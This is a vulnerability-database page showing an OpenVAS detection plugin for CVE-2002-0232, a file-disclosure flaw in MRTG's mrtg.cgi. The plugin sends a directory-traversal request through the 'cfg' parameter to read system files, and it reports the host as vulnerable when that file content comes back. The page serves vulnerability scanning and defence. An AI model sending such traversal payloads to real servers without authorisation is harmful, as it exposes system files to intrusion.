Lucene search
MRTG mrtg.cgi File Disclosure
🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2002 Digital Defense Inc.Type 
openvas🔗 plugins.openvas.org👁 34 Views
MRTG mrtg.cgi File Disclosure vulnerability in MRTG traffic visualization application allows remote attacker to view the first line of any file on the system. Mitigation is to block access to this CGI
Show more
| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
 | MRTG mrtg.cgi cfg Parameter Traversal Arbitrary Files Access | 5 Jun 200200:00 | – | nessus |
 | CVE-2002-0232 | 29 May 200204:00 | – | cve |
 | CVE-2002-0232 | 3 May 200204:00 | – | cvelist |
 | CVE-2002-0232 | 29 May 200204:00 | – | nvd |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/4017 |
# SPDX-FileCopyrightText: 2002 Digital Defense Inc.
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11001");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4017");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_cve_id("CVE-2002-0232");
script_name("MRTG mrtg.cgi File Disclosure");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2002 Digital Defense Inc.");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"solution", value:"Block access to this CGI.");
script_tag(name:"summary", value:"The mrtg.cgi script is part of the MRTG traffic
visualization application. A vulnerability exists in this script which allows an
attacker to view the first line of any file on the system.");
script_tag(name:"solution_type", value:"Mitigation");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
port = http_get_port( default:80 );
files = traversal_files();
foreach dir( make_list_unique( "/", http_cgi_dirs( port:port ) ) ) {
if( dir == "/" ) dir = "";
foreach file( keys( files ) ) {
url = dir + "/mrtg.cgi?cfg=/../../../../../../../../../" + files[file];
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
}
exit( 99 );
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo03 Nov 2005 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS25
EPSS0.01609